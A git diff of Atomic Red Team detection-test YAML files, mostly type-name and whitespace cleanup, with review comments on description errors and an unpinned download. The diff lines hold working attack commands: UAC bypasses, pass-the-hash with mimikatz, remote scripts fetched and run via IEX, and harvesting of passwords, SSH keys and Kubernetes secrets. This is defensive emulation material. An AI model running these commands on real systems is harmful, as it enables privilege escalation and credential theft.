+++ b/atomics/T1547.009/T1547.009.yaml @@ -12,7 +12,7 @@ atomic_tests: input_arguments: shortcut_file_path: description: shortcut modified and execute - type: Path + type: path default: '%temp%\T1547.009_modified_shortcut.url' executor: command: | diff --git a/atomics/T1547.010/T1547.010.yaml b/atomics/T1547.010/T1547.010.yaml index 5de6919d..be2f2330 100644 --- a/atomics/T1547.010/T1547.010.yaml +++ b/atomics/T1547.010/T1547.010.yaml @@ -3,13 +3,13 @@ display_name: 'Boot or Logon Autostart Execution: Port Monitors' atomic_tests: - name: Add Port Monitor persistence in Registry auto_generated_guid: d34ef297-f178-4462-871e-9ce618d44e50 - description: Add key-value pair to a Windows Port Monitor registry. On the subsequent reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege. + description: Add key-value pair to a Windows Port Monitor registry. On the subsequent reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege. supported_platforms: - windows input_arguments: monitor_dll: description: Addition to port monitor registry key. Normally refers to a DLL name in C:\Windows\System32. arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL. - type: Path + type: path default: C:\Path\AtomicRedTeam.dll executor: command: | diff --git a/atomics/T1547.014/T1547.014.yaml b/atomics/T1547.014/T1547.014.yaml index 65752e3a..16cb0ad6 100644 --- a/atomics/T1547.014/T1547.014.yaml +++ b/atomics/T1547.014/T1547.014.yaml 
@@ -7,17 +7,17 @@ atomic_tests: This test will create an "atomic_test" key under 'HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components' to launch calc by configuring an active setup executable and forcing to run active setup using the "runonce.exe /AlternateShellStartup" command. Without the "runonce.exe /AlternateShellStartup" command it would run during the next logon for each user. - + Note: If you logout before running the cleanup command, you will be required to go through the OOBE (out-of-box experience) setup sequence to log back in. The payload will only run once unless the cleanup command is run in between tests. - + [Active Setup Explained](https://helgeklein.com/blog/active-setup-explained/) supported_platforms: - windows input_arguments: payload: description: Payload to run once during login - type: String + type: string default: C:\Windows\System32\calc.exe executor: command: |- @@ -41,7 +41,7 @@ atomic_tests: input_arguments: payload: description: Payload to run once during login - type: String + type: string default: C:\Windows\System32\calc.exe executor: command: |- diff --git a/atomics/T1547.015/T1547.015.yaml b/atomics/T1547.015/T1547.015.yaml index b515826c..56195cbb 100644 --- a/atomics/T1547.015/T1547.015.yaml +++ b/atomics/T1547.015/T1547.015.yaml 
@@ -9,19 +9,19 @@ atomic_tests: input_arguments: calculator: description: Test program used to imitate a maliciously called program. - type: String + type: string default: calculator.exe settings_json_def: description: Default file for Windows Terminal to replace the default profile with a backdoor to call another program. - type: Path + type: path default: ~\AppData\Local\Packages\Microsoft.WindowsTerminal_8wekyb3d8bbwe\LocalState\settings.json settings_json_tmp: description: Temp file for Windows Terminal. - type: Path + type: path default: ~\AppData\Local\Temp\settings.json wt_exe: description: Windows Terminal executable. - type: Path + type: path default: ~\AppData\Local\Microsoft\WindowsApps\Microsoft.WindowsTerminal_8wekyb3d8bbwe\wt.exe dependency_executor_name: powershell dependencies: @@ -54,15 +54,15 @@ atomic_tests: input_arguments: scriptfile: description: path to Applescript source to add Safari LoginItem. - type: String + type: string default: PathToAtomicsFolder/T1547.015/src/add_login_item.osa cleanup_script: description: path to Applescript source to delete Safari LoginItem. - type: String + type: string default: PathToAtomicsFolder/T1547.015/src/remove_login_item.osa executor: command: | osascript #{scriptfile} cleanup_command: | osascript #{cleanup_script} - name: bash \ No newline at end of file + name: bash diff --git a/atomics/T1547/T1547.yaml b/atomics/T1547/T1547.yaml index a9cab92e..b9d721fe 100644 --- a/atomics/T1547/T1547.yaml +++ b/atomics/T1547/T1547.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: driver_inf: description: A built-in, already installed windows driver inf - type: Path + type: path default: 'C:\Windows\INF\usbstor.inf' executor: command: | diff --git a/atomics/T1548.001/T1548.001.yaml b/atomics/T1548.001/T1548.001.yaml index 152b4d9d..ce862d7b 100644 --- a/atomics/T1548.001/T1548.001.yaml +++ b/atomics/T1548.001/T1548.001.yaml 
@@ -11,7 +11,7 @@ atomic_tests: input_arguments: payload: description: hello.c payload - type: Path + type: path default: PathToAtomicsFolder/T1548.001/src/hello.c executor: command: | @@ -36,7 +36,7 @@ atomic_tests: input_arguments: file_to_setuid: description: Path of file to set SetUID flag - type: Path + type: path default: /tmp/evilBinary executor: command: | @@ -57,7 +57,7 @@ atomic_tests: input_arguments: file_to_setuid: description: Path of file to set SetGID flag - type: Path + type: path default: /tmp/evilBinary executor: command: | @@ -79,7 +79,7 @@ atomic_tests: input_arguments: payload: description: cap.c payload - type: Path + type: path default: PathToAtomicsFolder/T1548.001/src/cap.c executor: command: | @@ -100,8 +100,8 @@ atomic_tests: - linux input_arguments: file_to_setcap: - description: Path of file to provide the SetUID capability - type: Path + description: Path of file to provide the SetUID capability + type: path default: /tmp/evilBinary executor: command: | diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml index dc88ea28..2464a919 100644 --- a/atomics/T1548.002/T1548.002.yaml +++ b/atomics/T1548.002/T1548.002.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: executable_binary: description: Binary to execute with UAC Bypass - type: Path + type: path default: C:\Windows\System32\cmd.exe executor: command: | @@ -30,7 +30,7 @@ atomic_tests: input_arguments: executable_binary: description: Binary to execute with UAC Bypass - type: Path + type: path default: C:\Windows\System32\cmd.exe executor: command: | @@ -50,7 +50,7 @@ atomic_tests: input_arguments: executable_binary: description: Binary to execute with UAC Bypass - type: Path + type: path default: C:\Windows\System32\cmd.exe executor: command: | @@ -70,7 +70,7 @@ atomic_tests: input_arguments: executable_binary: description: Binary to execute with UAC Bypass - type: Path + type: path default: C:\Windows\System32\cmd.exe executor: command: | 
@@ -91,7 +91,7 @@ atomic_tests: input_arguments: executable_binary: description: Binary to execute with UAC Bypass - type: Path + type: path default: C:\Windows\System32\cmd.exe executor: command: | @@ -112,7 +112,7 @@ atomic_tests: input_arguments: executable_binary: description: Binary to execute with UAC Bypass - type: Path + type: path default: C:\Windows\System32\cmd.exe executor: command: | @@ -136,7 +136,7 @@ atomic_tests: input_arguments: command.to.execute: description: Command to execute - type: String + type: string default: cmd.exe /c notepad.exe executor: command: | @@ -165,22 +165,22 @@ atomic_tests: auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608 description: | Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ - + There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). - + For example, we can set the windir registry kye to: "cmd /k REM " - + And forcefully run SilentCleanup task: - + schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I - + REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. supported_platforms: - windows input_arguments: file_path: description: Path to the bat file - type: String + type: string default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat executor: command: | 
@@ -192,28 +192,28 @@ atomic_tests: description: | Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. - + Author: Leo Davidson derivative - + Type: Dll Hijack - + Method: IFileOperation - + Target: \system32\pkgmgr.exe - + Component: DismCore.dll - + Implementation: ucmDismMethod - + UCM Method: UacMethodDISM - + https://github.com/hfiref0x/UACME supported_platforms: - windows input_arguments: uacme_exe: description: Path to uacme executable - type: Path + type: path default: '%temp%\uacme\23 Akagi64.exe' dependency_executor_name: powershell dependencies: @@ -238,28 +238,28 @@ atomic_tests: description: | Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. - + Author: Enigma0x3 - + Type: Shell API - + Method: Registry key manipulation - + Target: \system32\sdclt.exe - + Component: Attacker defined - + Implementation: ucmSdcltIsolatedCommandMethod - + UCM Method: UacMethodShellSdclt - + https://github.com/hfiref0x/UACME supported_platforms: - windows input_arguments: uacme_exe: description: Path to uacme executable - type: Path + type: path default: '%temp%\uacme\31 Akagi64.exe' dependency_executor_name: powershell dependencies: 
@@ -284,28 +284,28 @@ atomic_tests: description: | Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. - + Author: winscripting.blog - + Type: Shell API - + Method: Registry key manipulation - + Target: \system32\fodhelper.exe - + Component: Attacker defined - + Implementation: ucmShellRegModMethod - + UCM Method: UacMethodMsSettings2 - + https://github.com/hfiref0x/UACME supported_platforms: - windows input_arguments: uacme_exe: description: Path to uacme executable - type: Path + type: path default: '%temp%\uacme\33 Akagi64.exe' dependency_executor_name: powershell dependencies: @@ -330,28 +330,28 @@ atomic_tests: description: | Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. - + Author: James Forshaw - + Type: Shell API - + Method: Environment variables expansion - + Target: \system32\svchost.exe via \system32\schtasks.exe - + Component: Attacker defined - + Implementation: ucmDiskCleanupEnvironmentVariable - + UCM Method: UacMethodDiskSilentCleanup - + https://github.com/hfiref0x/UACME supported_platforms: - windows input_arguments: uacme_exe: description: Path to uacme executable - type: Path + type: path default: '%temp%\uacme\34 Akagi64.exe' dependency_executor_name: powershell dependencies: 
@@ -376,28 +376,28 @@ atomic_tests: description: | Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. - + Author: Stefan Kanthak - + Type: Dll Hijack - + Method: .NET Code Profiler - + Target: \system32\mmc.exe - + Component: Attacker defined - + Implementation: ucmCorProfilerMethod - + UCM Method: UacMethodCorProfiler - + https://github.com/hfiref0x/UACME supported_platforms: - windows input_arguments: uacme_exe: description: Path to uacme executable - type: Path + type: path default: '%temp%\uacme\39 Akagi64.exe' dependency_executor_name: powershell dependencies: @@ -422,28 +422,28 @@ atomic_tests: description: | Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. - + Author: Hashim Jawad - + Type: Shell API - + Method: Registry key manipulation - + Target: \system32\WSReset.exe - + Component: Attacker defined - + Implementation: ucmShellRegModMethod - + UCM Method: UacMethodShellWSReset - + https://github.com/hfiref0x/UACME supported_platforms: - windows input_arguments: uacme_exe: description: Path to uacme executable - type: Path + type: path default: '%temp%\uacme\56 Akagi64.exe' dependency_executor_name: powershell dependencies: 
@@ -468,28 +468,28 @@ atomic_tests: description: | Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. - + Author: James Forshaw - + Type: AppInfo ALPC - + Method: RAiLaunchAdminProcess and DebugObject - + Target: Attacker defined - + Component: Attacker defined - + Implementation: ucmDebugObjectMethod - + UCM Method: UacMethodDebugObject - + https://github.com/hfiref0x/UACME supported_platforms: - windows input_arguments: uacme_exe: description: Path to uacme executable - type: Path + type: path default: '%temp%\uacme\59 Akagi64.exe' dependency_executor_name: powershell dependencies: @@ -514,28 +514,28 @@ atomic_tests: description: | Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. - + Author: Enigma0x3/bytecode77 derivative by Nassim Asrir - + Type: Shell API - + Method: Registry key manipulation - + Target: \system32\slui.exe, \system32\changepk.exe - + Component: Attacker defined - + Implementation: ucmShellRegModMethod - + UCM Method: UacMethodDebugObject - + https://github.com/hfiref0x/UACME supported_platforms: - windows input_arguments: uacme_exe: description: Path to uacme executable - type: Path + type: path default: '%temp%\uacme\61 Akagi64.exe' dependency_executor_name: powershell dependencies: 
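Review bot: In the @@ -514,28 hunk the description line `UCM Method: UacMethodDebugObject` carries the same label as the preceding @@ -468,28 hunk (the `59 Akagi64.exe` test), while every other field of this entry — Shell API, registry key manipulation, `ucmShellRegModMethod`, targets `slui.exe`/`changepk.exe` — describes a different technique, so this looks like a leftover from copying the 59 entry when the `61 Akagi64.exe` test was written. The whitespace cleanup in this commit walks straight past it; check the label for method 61 against the UACME README linked in the description and correct it rather than leaving two tests documented with the same method name.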
@@ -602,7 +602,7 @@ atomic_tests: description: | Disable User Account Conrol (UAC) for admin by setting the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin to 0. - + [MedusaLocker Ransomware](https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/), [Purple Fox Rootkit](https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit), [Avaddon Ransomware](https://blogs.blackberry.com/en/2021/06/threat-thursday-avaddon-ransomware-uses-ddos-attacks-as-triple-threat) @@ -628,11 +628,11 @@ atomic_tests: input_arguments: commandpath: description: Registry path - type: String + type: string default: 'HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command' commandtorun: description: Command to run - type: String + type: string default: 'C:\Windows\System32\cmd.exe /c start cmd.exe' executor: command: |- diff --git a/atomics/T1550.002/T1550.002.yaml b/atomics/T1550.002/T1550.002.yaml index e7e3ba93..5b046e6c 100644 --- a/atomics/T1550.002/T1550.002.yaml +++ b/atomics/T1550.002/T1550.002.yaml @@ -11,19 +11,19 @@ atomic_tests: input_arguments: user_name: description: username - type: String + type: string default: Administrator ntlm: description: ntlm hash - type: String + type: string default: cc36cf7a8514893efccd3324464tkg1a domain: description: domain - type: String + type: string default: '%userdnsdomain%' mimikatz_path: description: mimikatz windows executable - type: Path + type: path default: '%tmp%\mimikatz\x64\mimikatz.exe' dependency_executor_name: powershell dependencies: 
@@ -53,23 +53,23 @@ atomic_tests: input_arguments: user_name: description: username - type: String + type: string default: Administrator crackmapexec_exe: description: crackmapexec windows executable - type: Path + type: path default: C:\CrackMapExecWin\crackmapexec.exe command: description: command to execute - type: String + type: string default: whoami ntlm: description: command - type: String + type: string default: cc36cf7a8514893efccd3324464tkg1a domain: description: domain - type: String + type: string default: '%userdnsdomain%' dependency_executor_name: powershell dependencies: diff --git a/atomics/T1550.003/T1550.003.yaml b/atomics/T1550.003/T1550.003.yaml index afe8a9c3..c8efd933 100644 --- a/atomics/T1550.003/T1550.003.yaml +++ b/atomics/T1550.003/T1550.003.yaml @@ -10,11 +10,11 @@ atomic_tests: input_arguments: ticket: description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) - type: String - default: null + type: string + default: mimikatz_exe: description: Path of the Mimikatz binary - type: Path + type: path default: PathToAtomicsFolder\T1550.003\bin\x64\mimikatz.exe dependency_executor_name: powershell dependencies: 
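Review bot: The `ntlm` argument in the @@ -53,23 hunk is described as `command`, which duplicates the `command` argument just above it and says nothing about the value the test expects; the first test in this file describes the same argument as `ntlm hash`. Change it to `description: ntlm hash` so the two tests agree.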
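Review bot: `default:` with no value on the `ticket` argument (T1550.003, @@ -10,11 hunk) is read as null by YAML loaders, so it is equivalent to the `default: null` it replaces, but the bare form is what yamllint's `empty-values` rule flags and it reads as an accidentally blank field rather than a deliberate "no default". Keep `default: null` (or `default: ""` if the runner wants a string) so the missing default is explicit; if a serializer round-trip produced the bare form, that is where the fix belongs. The same change appears on the `username` argument of T1552.005 (the @@ -13,11 hunk).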
@@ -47,27 +47,27 @@ atomic_tests: default: localhost user_name: description: username associated with the ticket (privileged account not required) - type: String + type: string default: Administrator password: description: password for user_name - type: String + type: string default: Password domain: description: domain - type: String + type: string default: $Env:USERDOMAIN rubeus_path: description: Path of the Rubeus binary - type: Path + type: path default: $Env:TEMP\rubeus.exe rubeus_url: description: URL of Rubeus executable - type: Url + type: url default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe psexec_path: description: Path of the PsExec binary - type: String + type: string default: C:\PSTools\PsExec.exe dependency_executor_name: powershell dependencies: @@ -88,7 +88,7 @@ atomic_tests: Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force executor: name: powershell - elevation_required: true + elevation_required: true command: | #{psexec_path} -accepteula \\#{target} -w c:\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi Set-Location $env:TEMP diff --git a/atomics/T1552.001/T1552.001.yaml b/atomics/T1552.001/T1552.001.yaml index 4440b76c..7e4dd424 100644 --- a/atomics/T1552.001/T1552.001.yaml +++ b/atomics/T1552.001/T1552.001.yaml @@ -22,7 +22,7 @@ atomic_tests: input_arguments: file_path: description: Path to search - type: String + type: string default: / executor: command: | 
@@ -59,13 +59,13 @@ atomic_tests: This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. supported_platforms: - - macos - - linux + - macos + - linux executor: name: bash elevation_required: false # Indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false. - command: | + command: | for file in $(find / -name .netrc 2> /dev/null);do echo $file ; cat $file ; done - name: WinPwn - sensitivefiles auto_generated_guid: 114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0 @@ -140,5 +140,4 @@ atomic_tests: $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') SharpCloud -consoleoutput -noninteractive - name: powershell - + name: powershell diff --git a/atomics/T1552.003/T1552.003.yaml b/atomics/T1552.003/T1552.003.yaml index d864ae54..3e9a7f9c 100644 --- a/atomics/T1552.003/T1552.003.yaml +++ b/atomics/T1552.003/T1552.003.yaml @@ -11,17 +11,17 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: ~/loot.txt bash_history_grep_args: description: grep arguments that filter out specific commands we want to capture - type: Path + type: path default: -e '-p ' -e 'pass' -e 'ssh' bash_history_filename: description: Path of the bash history file to capture - type: Path + type: path default: ~/.bash_history executor: command: | cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} - name: sh \ No newline at end of file + name: sh diff --git a/atomics/T1552.004/T1552.004.yaml b/atomics/T1552.004/T1552.004.yaml index 95711c90..1c0360f7 100644 --- a/atomics/T1552.004/T1552.004.yaml +++ b/atomics/T1552.004/T1552.004.yaml 
@@ -23,11 +23,11 @@ atomic_tests: input_arguments: search_path: description: Path where to start searching from. - type: Path + type: path default: / output_file: description: Output file containing locations of SSH key files - type: Path + type: path default: /tmp/keyfile_locations.txt executor: command: | @@ -44,11 +44,11 @@ atomic_tests: input_arguments: search_path: description: Path where to start searching from. - type: Path + type: path default: / output_folder: description: Output folder containing copies of SSH private key files - type: Path + type: path default: /tmp/art-staging executor: command: | @@ -67,11 +67,11 @@ atomic_tests: input_arguments: search_path: description: Path where to start searching from. - type: Path + type: path default: / output_folder: description: Output folder containing copies of SSH private key files - type: Path + type: path default: /tmp/art-staging executor: command: | @@ -90,11 +90,11 @@ atomic_tests: input_arguments: search_path: description: Path where to start searching from - type: Path + type: path default: / output_folder: description: Output folder containing a copy of the .gnupg directory - type: Path + type: path default: /tmp/GnuPG executor: command: | @@ -138,19 +138,19 @@ atomic_tests: input_arguments: adfs_service_account_name: description: Name of the ADFS service account - type: String + type: string default: "adfs_svc" replication_user: description: Username with replication rights. It can be the Domain Admin running the script - type: String + type: string default: "Administrator" replication_password: description: Password of replication_username - type: String + type: string default: "ReallyStrongPassword" adfs_server_name: description: Name of an ADFS server - type: String + type: string default: "sts.contoso.com" dependency_executor_name: powershell dependencies: 
@@ -209,18 +209,18 @@ atomic_tests: input_arguments: output: description: file path to export to - type: Path + type: path default: c:\temp\atomic.pfx password: description: password for cert - type: String + type: string default: password executor: command: | - IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) - certutil.exe -p #{password} -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 #{output} + IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) + certutil.exe -p #{password} -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 #{output} cleanup_command: | - Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item + Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item name: powershell elevation_required: true - name: Export Root Certificate with Export-PFXCertificate @@ -233,7 +233,7 @@ atomic_tests: input_arguments: pfx_path: description: output path of the certificate - type: String + type: string default: $env:Temp\atomicredteam.pfx executor: command: | @@ -259,7 +259,7 @@ atomic_tests: input_arguments: pfx_path: description: Path of the certificate - type: Path + type: path default: $env:Temp\AtomicRedTeam.cer executor: command: | @@ -285,7 +285,7 @@ atomic_tests: input_arguments: mimikatz_exe: description: Path of the Mimikatz binary - type: String + type: string default: PathToAtomicsFolder\T1003.001\bin\x64\mimikatz.exe dependency_executor_name: powershell dependencies: diff --git a/atomics/T1552.005/T1552.005.yaml b/atomics/T1552.005/T1552.005.yaml index d63480da..3c886630 100644 --- a/atomics/T1552.005/T1552.005.yaml +++ b/atomics/T1552.005/T1552.005.yaml 
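Review bot: The `IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing)` line in the @@ -209,18 hunk fetches and executes a script from the moving `master` ref, so what this test runs can change with no change to this file, and it downloads a file that lives in this same repository. Other fetches in this changeset pin a commit (T1552.006's Get-GPPPassword URL, T1550.003's Rubeus URL); do the same here, `raw/<commit-sha>/atomics/T1553.004/src/RemoteCertTrust.ps1`, or run the local copy via `PathToAtomicsFolder\T1553.004\src\RemoteCertTrust.ps1` if that file is present in the atomics tree. The re-indentation in this hunk is the only change the commit makes to these lines.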
@@ -13,11 +13,11 @@ atomic_tests: input_arguments: username: description: Azure AD username - type: String - default: null + type: string + default: password: description: Azure AD password - type: String + type: string default: T1082Az dependency_executor_name: powershell dependencies: @@ -54,7 +54,7 @@ atomic_tests: input_arguments: output_file: description: File to output metadata to - type: String + type: string default: $env:temp\T1552.005Test2.txt executor: command: | diff --git a/atomics/T1552.006/T1552.006.yaml b/atomics/T1552.006/T1552.006.yaml index 750b7269..372d33d4 100644 --- a/atomics/T1552.006/T1552.006.yaml +++ b/atomics/T1552.006/T1552.006.yaml @@ -33,11 +33,11 @@ atomic_tests: input_arguments: gpp_script_url: description: URL of the Get-GPPPassword PowerShell Script - type: Url + type: url default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/87630cac639f29c2adcb163f661f02890adf4bdd/Exfiltration/Get-GPPPassword.ps1 gpp_script_path: description: Path to the Get-GPPPassword PowerShell Script - type: Path + type: path default: PathToAtomicsFolder\T1552.006\src\Get-GPPPassword.ps1 dependency_executor_name: powershell dependencies: diff --git a/atomics/T1552.007/T1552.007.yaml b/atomics/T1552.007/T1552.007.yaml index d912b0f6..e59b9eb7 100644 --- a/atomics/T1552.007/T1552.007.yaml +++ b/atomics/T1552.007/T1552.007.yaml 
@@ -1,105 +1,105 @@ -attack_technique: T1552.007 -display_name: Kubernetes List Secrets -atomic_tests: -- name: List All Secrets +attack_technique: T1552.007 +display_name: Kubernetes List Secrets +atomic_tests: +- name: List All Secrets auto_generated_guid: 31e794c4-48fd-4a76-aca4-6587c155bc11 - description: | - A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services or provide further access to the cluster. - [More information about secrets](https://kubernetes.io/docs/concepts/configuration/secret/). - - This test will make a request to the Kubernetes api at the `/api/v1/secrets` endpoint requesting every secret stored within the cluster. - supported_platforms: - - containers - dependencies: - - description: | - kubectl must be installed - prereq_command: | - which kubectl - get_prereq_command: | - echo "kubectl not installed, please install kubectl (https://kubernetes.io/docs/tasks/tools/)" - executor: - command: | - kubectl get secrets --all-namespaces - name: bash - elevation_required: false - -- name: ListSecrets - auto_generated_guid: 43c3a49d-d15c-45e6-b303-f6e177e44a9a - description: | - A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services. 
- supported_platforms: - - containers - input_arguments: - namespace: - description: K8s namespace to list - type: String - default: default - dependencies: - - description: | - kubectl must be installed - get_prereq_command: | - echo "kubectl must be installed manually" - prereq_command: | - which kubectl - executor: - command: | - kubectl get secrets -n #{namespace} - name: bash - elevation_required: false - -- name: Cat the contents of a Kubernetes service account token file - auto_generated_guid: 788e0019-a483-45da-bcfe-96353d46820f - description: | - Access the Kubernetes service account access token stored within a container in a cluster. - - supported_platforms: - - linux - - dependency_executor_name: sh - dependencies: - - description: Verify docker is installed. - prereq_command: | - which docker - get_prereq_command: | - if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi - - - description: Verify docker service is running. - prereq_command: | - sudo systemctl status docker - get_prereq_command: | - sudo systemctl start docker - - - description: Verify kind is in the path. - prereq_command: | - which kind - get_prereq_command: | - curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 - chmod +x ./kind - mv kind /usr/bin/kind - - - description: Verify kind-atomic-cluster is created - prereq_command: | - sudo kind get clusters - get_prereq_command: | - sudo kind create cluster --name atomic-cluster - - - description: Verify kubectl is in path - prereq_command: | - which kubectl - get_prereq_command: | - curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" - chmod +x ./kubectl - mv kubectl /usr/bin/kubectl - - - description: Verify atomic-pod is running. 
- prereq_command: | - kubectl --context kind-atomic-cluster get pods |grep atomic-pod - get_prereq_command: | - kubectl --context kind-atomic-cluster run atomic-pod --image=alpine --command -- sleep infinity - - executor: - command: | - kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token - name: sh - cleanup_command: | - kubectl --context kind-atomic-cluster delete pod atomic-pod + description: | + A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services or provide further access to the cluster. + [More information about secrets](https://kubernetes.io/docs/concepts/configuration/secret/). + + This test will make a request to the Kubernetes api at the `/api/v1/secrets` endpoint requesting every secret stored within the cluster. + supported_platforms: + - containers + dependencies: + - description: | + kubectl must be installed + prereq_command: | + which kubectl + get_prereq_command: | + echo "kubectl not installed, please install kubectl (https://kubernetes.io/docs/tasks/tools/)" + executor: + command: | + kubectl get secrets --all-namespaces + name: bash + elevation_required: false + +- name: ListSecrets + auto_generated_guid: 43c3a49d-d15c-45e6-b303-f6e177e44a9a + description: | + A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. 
Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services. + supported_platforms: + - containers + input_arguments: + namespace: + description: K8s namespace to list + type: string + default: default + dependencies: + - description: | + kubectl must be installed + get_prereq_command: | + echo "kubectl must be installed manually" + prereq_command: | + which kubectl + executor: + command: | + kubectl get secrets -n #{namespace} + name: bash + elevation_required: false + +- name: Cat the contents of a Kubernetes service account token file + auto_generated_guid: 788e0019-a483-45da-bcfe-96353d46820f + description: | + Access the Kubernetes service account access token stored within a container in a cluster. + + supported_platforms: + - linux + + dependency_executor_name: sh + dependencies: + - description: Verify docker is installed. + prereq_command: | + which docker + get_prereq_command: | + if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi + + - description: Verify docker service is running. + prereq_command: | + sudo systemctl status docker + get_prereq_command: | + sudo systemctl start docker + + - description: Verify kind is in the path. 
